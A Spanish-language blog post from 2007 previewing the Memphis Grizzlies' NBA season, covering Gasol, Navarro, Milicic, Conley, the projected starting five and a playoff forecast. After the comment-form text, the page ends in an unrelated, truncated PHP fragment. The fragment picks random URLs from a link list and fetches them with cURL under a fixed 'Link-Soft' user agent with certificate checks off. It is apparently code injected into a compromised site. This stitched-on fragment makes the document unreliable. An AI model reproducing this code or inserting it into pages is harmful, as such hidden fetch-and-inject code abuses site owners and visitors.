Memphis Grizzlies: y volver, volver, volver

24 de September de 2007 por txusma

“Tengo el presentimiento de que me voy de Memphis”. A principios de febrero todo apuntaba a que la estrella de los Grizzlies, Pau Gasol, abandonaría la franquicia para recalar en un equipo con más aspiraciones. Los Bulls parecían el seguro destino del de Sant Boi, donde junto con Ben Wallace, Kirk Hinrich y Luol Deng conformaría una de las plantillas más potentes del Este y clara candidata al título de Conferencia y al anillo. Pero el traspaso nunca llegó a producirse y Gasol acabó la temporada siendo abucheado por su propia afición pero demostrando con números y profesionalidad el gran jugador que es.

Se esperaba que durante el verano se volvieran a abrir las negociaciones pero Gasol aseguró que si los Grizzlies fichaban a Navarro él se quedaría comandando de nuevo el barco. Dicho y hecho: los Grizzlies hicieron un esfuerzo para hacerse con sus derechos (dieron a cambio una futura primera ronda) y ‘La Bomba’ recibió la noticia de su contratación en plena concentración de la selección española. Los dos amigos volvían a estar juntos.

La de Navarro ha sido una adquisición importante para Memphis pero no la única. Desde el principio de la carrera de Gasol en la NBA se comprobó que cuando mejor rendía era con un C fuerte a su lado que le evitara hacer todo el trabajo sucio en defensa. Gasol ha tenido multitud de compañeros en el juego interior (Lorenzen Wright, Stromile Swift, Drew Gooden, Jake Tsakalidis, etc.) pero ninguno ha sabido asentarse de manera más o menos permanente. Nuevamente este verano los Grizzlies salían al mercado de agentes libres a la búsqueda de un C para su maltrecho juego interior. En un primer momento se barajó la opción de Anderson Varejao pero finalmente se decidieron a contratar a todo un número 2 del draft: el serbio Darko Milicic. Está por ver qué hará Milicic en los Grizzlies pero tras su paso por Orlando, donde promedió la última temporada 8 puntos y 5’5 rebotes en apenas 24 minutos, se espera que acabe de crecer como jugador y demuestre la calidad que se le auguraba en aquel draft de 2003. A priori ha de complementarse muy bien con Gasol, descargándole de responsabilidades defensivas y formando un juego interior muy interesante en el Oeste.

Debido a la mala campaña pasada, Memphis contó en este último draft con una muy buena elección de primera ronda y con ella escogieron a Mike Conley, el base de Ohio State que jugaba al lado de Oden. La elección no estuvo carente de polémica ya que muchos analistas y aficionados pensaron que la elección de Conley en el número 4 era excesiva y más viendo algunos jugadores que fueron escogidos posteriormente (Noah, Brewer, Wright, etc.). Pero las ligas de verano acallaron parte de estas críticas y Conley se postula como el base titular de estos Grizzlies.

Completando el quinteto aparecen Mike Miller y Rudy Gay. El de Florida, que está disfrutando de sus mejores años de profesional, seguirá siendo el referente en el juego exterior y si la conexión Gasol – Milicic funciona es posible que goce de más espacios para sus rapidísimos tiros. Gay, en cambio, ha de seguir creciendo. El año pasado ya dejó entrever todas las cualidades que le llevaron al número 8 del draft y empezó a dar la razón a los que defendieron su adquisición a cambio del queridísimo Shane Battier. Gay ha demostrado ser un jugador muy fuerte físicamente y no carente de técnica y talento aunque aún ha de pulir su tiro para ser un jugador total. Este año seguirá disfrutando de muchos minutos y su evolución se da por segura.

En el banco jugadores de la talla de Hakim Warrick, Stromile Swift, Kyle Lowry (tras un año casi en blanco), Casey Jacobsen, Tarence Kinsey, más el anteriormente mentado Juan Carlos Navarro conforman una plantilla aparentemente amplia y con múltiples recursos. Si Iavaroni es capaz de jugar sus cartas con inteligencia los Grizzlies pueden volver a luchar por entrar en los Playoffs este año. Y es que esta plantilla no es en absoluto inferior a la de la temporada 2005-2006, cuando con un quinteto formado por Chucky Atkins, Eddie Jones, Shane Battier, Pau Gasol y Lorenzen Wright y las aportaciones de Mike Miller y Bobby Jackson desde el banco, los Grizzlies acabaron cuartos de la conferencia Oeste perdiendo tan solo 33 partidos. Después de un año aciago el FedEx Forum Arena puede volver a disfrutar con su equipo.

Quinteto: Mike Conley, Mike Miller, Rudy Gay, Pau Gasol y Darko Milicic
Sexto hombre: Juan Carlos Navarro

Pronóstico: Se quedarán a las puertas de los Playoffs.

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>